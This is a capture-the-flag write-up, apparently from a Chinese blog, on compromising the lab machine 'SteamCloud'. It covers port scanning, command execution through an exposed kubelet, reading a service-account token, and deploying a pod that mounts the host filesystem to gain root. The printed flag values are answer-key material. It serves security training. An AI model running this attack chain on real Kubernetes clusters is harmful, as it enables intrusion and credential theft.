Information Gathering

$ sudo masscan -p1-65535,U:1-65535 10.10.11.133 --rate=1000 -p1-65535,U:1-65535 -e tun0 > /tmp/ports
$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
$ nmap -Pn -sV -sC -p$ports 10.10.11.133

PORT      STATE SERVICE          VERSION
22/tcp    open  ssh              OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fc:fb:90:ee:7c:73:a1:d4:bf:87:f8:71:e8:44:c6:3c (RSA)
|   256 46:83:2b:1b:01:db:71:64:6a:3e:27:cb:53:6f:81:a1 (ECDSA)
|_  256 1d:8d:d3:41:f3:ff:a4:37:e8:ac:78:08:89:c2:e3:c5 (ED25519)
2379/tcp  open  ssl/etcd-client?
| tls-alpn: 
|_  h2
| ssl-cert: Subject: commonName=steamcloud
| Subject Alternative Name: DNS:localhost, DNS:steamcloud, IP Address:10.10.11.133, IP Address:127.0.0.1, IP Address:0:0:0:0:0:0:0:1
| Not valid before: 2025-01-24T04:39:05
|_Not valid after:  2026-01-24T04:39:05
|_ssl-date: TLS randomness does not represent time
2380/tcp  open  ssl/etcd-server?
| ssl-cert: Subject: commonName=steamcloud
| Subject Alternative Name: DNS:localhost, DNS:steamcloud, IP Address:10.10.11.133, IP Address:127.0.0.1, IP Address:0:0:0:0:0:0:0:1
| Not valid before: 2025-01-24T04:39:05
|_Not valid after:  2026-01-24T04:39:05
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  h2
8443/tcp  open  ssl/https-alt
| tls-alpn: 
|   h2
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 403 Forbidden
|     Audit-Id: 6b4621bf-7930-4a2f-8c49-74add366dd60
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: abfeee27-f5ee-4433-8cb9-a594adbc6db6
|     X-Kubernetes-Pf-Prioritylevel-Uid: 3d2b5b73-6c73-4e3f-a540-29191fcdc2d0
|     Date: Fri, 24 Jan 2025 04:46:12 GMT
|     Content-Length: 212
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/nice ports,/Trinity.txt.bak"","reason":"Forbidden","details":{},"code":403}
|   GetRequest: 
|     HTTP/1.0 403 Forbidden
|     Audit-Id: bc7e3d97-a3ae-4bcb-8b92-5e99c22912e0
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: abfeee27-f5ee-4433-8cb9-a594adbc6db6
|     X-Kubernetes-Pf-Prioritylevel-Uid: 3d2b5b73-6c73-4e3f-a540-29191fcdc2d0
|     Date: Fri, 24 Jan 2025 04:46:09 GMT
|     Content-Length: 185
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/"","reason":"Forbidden","details":{},"code":403}
|   HTTPOptions: 
|     HTTP/1.0 403 Forbidden
|     Audit-Id: a81f3169-fbce-4f9b-bad0-022462d1f1b4
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: abfeee27-f5ee-4433-8cb9-a594adbc6db6
|     X-Kubernetes-Pf-Prioritylevel-Uid: 3d2b5b73-6c73-4e3f-a540-29191fcdc2d0
|     Date: Fri, 24 Jan 2025 04:46:11 GMT
|     Content-Length: 189
|_    {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot options path "/"","reason":"Forbidden","details":{},"code":403}
| ssl-cert: Subject: commonName=minikube/organizationName=system:masters
| Subject Alternative Name: DNS:minikubeCA, DNS:control-plane.minikube.internal, DNS:kubernetes.default.svc.cluster.local, DNS:kubernetes.default.svc, DNS:kubernetes.default, DNS:kubernetes, DNS:localhost, IP Address:10.10.11.133, IP Address:10.96.0.1, IP Address:127.0.0.1, IP Address:10.0.0.1
| Not valid before: 2025-01-23T04:39:04
|_Not valid after:  2028-01-24T04:39:04
10249/tcp open  http             Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
10250/tcp open  ssl/http         Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
| tls-alpn: 
|   h2
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=steamcloud@1737693547
| Subject Alternative Name: DNS:steamcloud
| Not valid before: 2025-01-24T03:39:06
|_Not valid after:  2026-01-24T03:39:06
10256/tcp open  http             Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.94SVN%T=SSL%I=7%D=1/24%Time=67931ED6%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,22F,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x20bc
SF:7e3d97-a3ae-4bcb-8b92-5e99c22912e0\r\nCache-Control:\x20no-cache,\x20pr
SF:ivate\r\nContent-Type:\x20application/json\r\nX-Content-Type-Options:\x
SF:20nosniff\r\nX-Kubernetes-Pf-Flowschema-Uid:\x20abfeee27-f5ee-4433-8cb9
SF:-a594adbc6db6\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x203d2b5b73-6c73-4e
SF:3f-a540-29191fcdc2d0\r\nDate:\x20Fri,\x2024\x20Jan\x202025\x2004:46:09\
SF:x20GMT\r\nContent-Length:\x20185\r\n\r\n{\"kind\":\"Status\",\"apiVersi
SF:on\":\"v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbid
SF:den:\x20User\x20\\\"system:anonymous\\\"\x20cannot\x20get\x20path\x20\\
SF:\"/\\\"\",\"reason\":\"Forbidden\",\"details\":{},\"code\":403}\n")%r(H
SF:TTPOptions,233,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x20a81f3169-
SF:fbce-4f9b-bad0-022462d1f1b4\r\nCache-Control:\x20no-cache,\x20private\r
SF:\nContent-Type:\x20application/json\r\nX-Content-Type-Options:\x20nosni
SF:ff\r\nX-Kubernetes-Pf-Flowschema-Uid:\x20abfeee27-f5ee-4433-8cb9-a594ad
SF:bc6db6\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x203d2b5b73-6c73-4e3f-a540
SF:-29191fcdc2d0\r\nDate:\x20Fri,\x2024\x20Jan\x202025\x2004:46:11\x20GMT\
SF:r\nContent-Length:\x20189\r\n\r\n{\"kind\":\"Status\",\"apiVersion\":\"
SF:v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden:\x2
SF:0User\x20\\\"system:anonymous\\\"\x20cannot\x20options\x20path\x20\\\"/
SF:\\\"\",\"reason\":\"Forbidden\",\"details\":{},\"code\":403}\n")%r(Four
SF:OhFourRequest,24A,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x206b4621
SF:bf-7930-4a2f-8c49-74add366dd60\r\nCache-Control:\x20no-cache,\x20privat
SF:e\r\nContent-Type:\x20application/json\r\nX-Content-Type-Options:\x20no
SF:sniff\r\nX-Kubernetes-Pf-Flowschema-Uid:\x20abfeee27-f5ee-4433-8cb9-a59
SF:4adbc6db6\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x203d2b5b73-6c73-4e3f-a
SF:540-29191fcdc2d0\r\nDate:\x20Fri,\x2024\x20Jan\x202025\x2004:46:12\x20G
SF:MT\r\nContent-Length:\x20212\r\n\r\n{\"kind\":\"Status\",\"apiVersion\"
SF::\"v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden:
SF:\x20User\x20\\\"system:anonymous\\\"\x20cannot\x20get\x20path\x20\\\"/n
SF:ice\x20ports,/Trinity\.txt\.bak\\\"\",\"reason\":\"Forbidden\",\"detail
SF:s\":{},\"code\":403}\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Kubelet - RCE

Kubelet 是 Kubernetes 中的一个核心组件，它是运行在每个工作节点（Node）上的主要进程，用于管理和维护节点上的容器。它与 Kubernetes 的控制平面（如 API Server）通信，接收分配到该节点的任务并执行它们，同时报告节点的状态。

# curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"

枚举pods

$ ./kubeletctl_linux_amd64 --server 10.10.11.133 pods

$ ./kubeletctl_linux_amd64 --server 10.10.11.133 exec "whoami" -p nginx -c nginx

$ ./kubeletctl_linux_amd64 --server 10.10.11.133 exec "/bin/bash" -p nginx -c nginx

User.txt

6f85b72ab0e8c2cd1c46d2e5a7cd3d65

Privilege Escalation ： Kubelet && kubectl

https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#kubernetes-enumeration

root@nginx:~# ls -la /run/secrets/kubernetes.io/serviceaccount

root@nginx:/var/run/secrets/kubernetes.io/serviceaccount# cat token
root@nginx:/var/run/secrets/kubernetes.io/serviceaccount# cat ca.crt

$ ./kubectl -s https://10.10.11.133:8443 get pods --certificate-authority=/tmp/ca.crt --token=$token

apiVersion: v1
kind: Pod
metadata:
  name: evil-maptnh
  namespace: default
spec:
  containers:
  - name: evil-maptnh
    image: nginx:1.14.2
    volumeMounts:
    - mountPath: /mnt
      name: evil-exp
  volumes:
  - name: evil-exp
    hostPath:
      path: /

$ ./kubectl -s https://10.10.11.133:8443 --certificate-authority=/tmp/ca.crt --token=$token apply -f /tmp/evil.yaml

$ ./kubectl -s https://10.10.11.133:8443 --certificate-authority=/tmp/ca.crt --token=$token get pods

$ ./kubeletctl_linux_amd64 --server 10.10.11.133 exec "/bin/bash" -p evil-maptnh -c evil-maptnh

Root.txt

a7d4b0817cea88036a6846107f92edb2

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）